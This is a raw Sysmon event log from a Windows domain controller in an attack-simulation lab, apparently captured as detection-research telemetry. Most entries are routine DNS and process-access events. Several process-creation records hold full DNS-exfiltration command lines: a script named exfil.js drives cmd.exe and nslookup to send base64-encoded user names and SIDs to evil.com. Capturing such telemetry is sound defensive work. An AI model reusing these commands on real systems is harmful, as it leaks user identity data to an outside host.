354300x8000000000000000195009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.446{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52165- 354300x8000000000000000195008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.446{00000000-0000-0000-0000-000000000000}408<unknown process>-udptruefalse127.0.0.1-52165-false127.0.0.1-53domain 354300x8000000000000000195007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52164- 354300x8000000000000000195006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.376{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52163- 354300x8000000000000000195005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.376{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52162- 354300x8000000000000000195004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.376{00000000-0000-0000-0000-000000000000}7632<unknown process>-udptruefalse127.0.0.1-52162-false127.0.0.1-53domain 354300x8000000000000000195003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.293{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52161- 354300x8000000000000000195002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.292{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52160- 354300x8000000000000000195001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.292{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52159- 354300x8000000000000000195000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.292{00000000-0000-0000-0000-000000000000}3460<unknown process>-udptruefalse127.0.0.1-52159-false127.0.0.1-53domain 354300x8000000000000000194999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.145{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52158- 354300x8000000000000000194998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.144{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52157- 354300x8000000000000000194997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.143{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52156- 354300x8000000000000000194996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.143{00000000-0000-0000-0000-000000000000}2036<unknown process>-udptruefalse127.0.0.1-52156-false127.0.0.1-53domain 354300x8000000000000000194995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.036{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52155- 354300x8000000000000000194994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.929{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52154- 354300x8000000000000000194993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.927{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52153- 354300x8000000000000000194992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.922{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52152- 354300x8000000000000000194991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.824{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52151- 354300x8000000000000000194990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.824{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52150- 354300x8000000000000000194989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.823{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52149- 354300x8000000000000000194988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.823{00000000-0000-0000-0000-000000000000}6716<unknown process>-udptruefalse127.0.0.1-52149-false127.0.0.1-53domain 354300x8000000000000000194987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52148- 354300x8000000000000000194986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.719{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52147- 354300x8000000000000000194985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.718{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52146- 354300x8000000000000000194984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.716{00000000-0000-0000-0000-000000000000}4864<unknown process>-udptruefalse127.0.0.1-52146-false127.0.0.1-53domain 354300x8000000000000000194983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.619{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52145- 354300x8000000000000000194982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.619{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52144- 354300x8000000000000000194981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52143- 354300x8000000000000000194980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.618{00000000-0000-0000-0000-000000000000}4796<unknown process>-udptruefalse127.0.0.1-52143-false127.0.0.1-53domain 354300x8000000000000000194979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.527{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52142- 354300x8000000000000000194978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.527{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52141- 354300x8000000000000000194977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.527{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52140- 354300x8000000000000000194976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.527{00000000-0000-0000-0000-000000000000}7592<unknown process>-udptruefalse127.0.0.1-52140-false127.0.0.1-53domain 10341000x8000000000000000194975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.124{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-133E-000000005F02}8C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.124{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-133E-000000005F02}8C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.124{2E1864BB-17A9-629A-133E-000000005F02}82668C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-123E-000000005F02}1960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.107{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-133E-000000005F02}8C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.107{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-123E-000000005F02}1960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.107{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.107{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.107{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.107{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.107{2E1864BB-17A1-629A-783D-000000005F02}55526148C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-123E-000000005F02}1960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.112{2E1864BB-17A9-629A-123E-000000005F02}1960C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldvg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.107{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmyub.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.069{2E1864BB-17A9-629A-103E-000000005F02}50604784C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-113E-000000005F02}7996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.054{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.054{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.054{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.054{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.054{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-113E-000000005F02}7996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.054{2E1864BB-17A8-629A-0F3E-000000005F02}41766092C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-113E-000000005F02}7996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.065{2E1864BB-17A9-629A-113E-000000005F02}7996C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-0F3E-000000005F02}4176C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmyub.tmp 2>&1 10341000x8000000000000000194955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.022{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-103E-000000005F02}5060C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 